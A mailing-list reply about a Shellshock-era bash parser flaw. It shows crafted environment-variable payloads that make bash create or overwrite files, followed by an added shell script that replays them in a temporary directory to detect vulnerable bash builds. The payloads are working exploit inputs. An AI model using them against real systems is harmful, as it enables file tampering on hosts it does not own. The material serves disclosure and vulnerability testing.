Eric Blake wrote:
> https://bugzilla.redhat.com/show_bug.cgi?id=1141597 describes this bug
> (aka CVE-2014-6271), and points out that even _with_ this patch, there
> is still a flaw that attackers can use to overwrite portions of the
> filesystem, which is also a possible exploitation avenue:
>
> $ ls -l date
> ls: cannot access date: No such file or directory
> $ env -i X='() { (a)=>\' bash -c 'date'
> bash: X: line 1: syntax error near unexpected token `='
> bash: X: line 1: `'
> bash: error importing function definition for `X'
> $ ls -l date
> -rw-------. 1 taviso taviso 0 Sep 24 14:06 date
It doesn't just create 0-sized files:

$ echo "{ echo 'Hello World' }" > foo.sh
$ VAR='() { (a) =>\' bash foo.sh
bash: VAR: line 1: syntax error near unexpected token `='
bash: VAR: line 1: `'
bash: error importing function definition for `VAR'
$ cat {
Hello World }

OTOH, had we used bash -c foo.sh, it would have removed the script contents (truncated to 0 bytes).
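The two transcripts above can be turned into a self-contained probe. The script below is an added example and is not part of the thread or of the bash project: it replays exactly the two payloads quoted above (Tavis's `X='() { (a)=>\'` with `bash -c 'date'`, and the reply's `VAR='() { (a) =>\'` with `bash foo.sh`) inside a throwaway directory and reports whether the failed function import left a pending `>` redirection that created a stray file. It assumes a `bash` binary is reachable (the path can be passed as the first argument) and that `mktemp -d` is available; the function name `shellshock_file_probe` is the example's own. It only checks this file-creation side effect, not the original CVE-2014-6271 code-execution path.

```shell
#!/bin/sh
# Added example, not from the thread: probe a bash binary for the parser-state
# leak shown above. After the function import fails with a syntax error, a
# pending '>' redirection survives and is applied to the next word bash parses:
# the -c command string in the first case, the script's first word in the second.
# Everything happens in a temporary directory so the real filesystem is untouched.

# Usage: shellshock_file_probe [path-to-bash]
# Prints "vulnerable" if either payload created a stray file, "not vulnerable"
# if neither did, and "skipped" if no executable bash was found.
shellshock_file_probe() {
    bash_bin="${1:-$(command -v bash 2>/dev/null)}"
    if [ -z "$bash_bin" ] || [ ! -x "$bash_bin" ]; then
        echo skipped
        return 0
    fi

    workdir="$(mktemp -d)" || return 1
    result="not vulnerable"

    # Case 1 (the quoted -c transcript): the word 'date' from the -c string
    # becomes the redirection target, so an empty file named 'date' appears.
    ( cd "$workdir" && env -i X='() { (a)=>\' "$bash_bin" -c 'date' >/dev/null 2>&1 ) || true
    [ -e "$workdir/date" ] && result="vulnerable"

    # Case 2 (the reply's transcript): the script's first word is '{', so a file
    # named '{' is created and the echo output is written into it.
    printf '%s\n' "{ echo 'Hello World' }" > "$workdir/foo.sh"
    ( cd "$workdir" && VAR='() { (a) =>\' "$bash_bin" foo.sh >/dev/null 2>&1 ) || true
    [ -e "$workdir/{" ] && result="vulnerable"

    rm -rf "$workdir"
    echo "$result"
}

# Stand-alone use: report on the default bash, or on the one given as $1.
shellshock_file_probe "$@"
```

On a bash that still imports `() {` variables from the environment, the probe prints `vulnerable` and the two stray files (`date` and `{`) are created only inside the temporary directory before it is removed; on a bash that has stopped importing such variables the payloads are ignored, no files appear, and it prints `not vulnerable`. Run it as the unprivileged user whose environment an attacker could influence, since the files are created with that user's permissions.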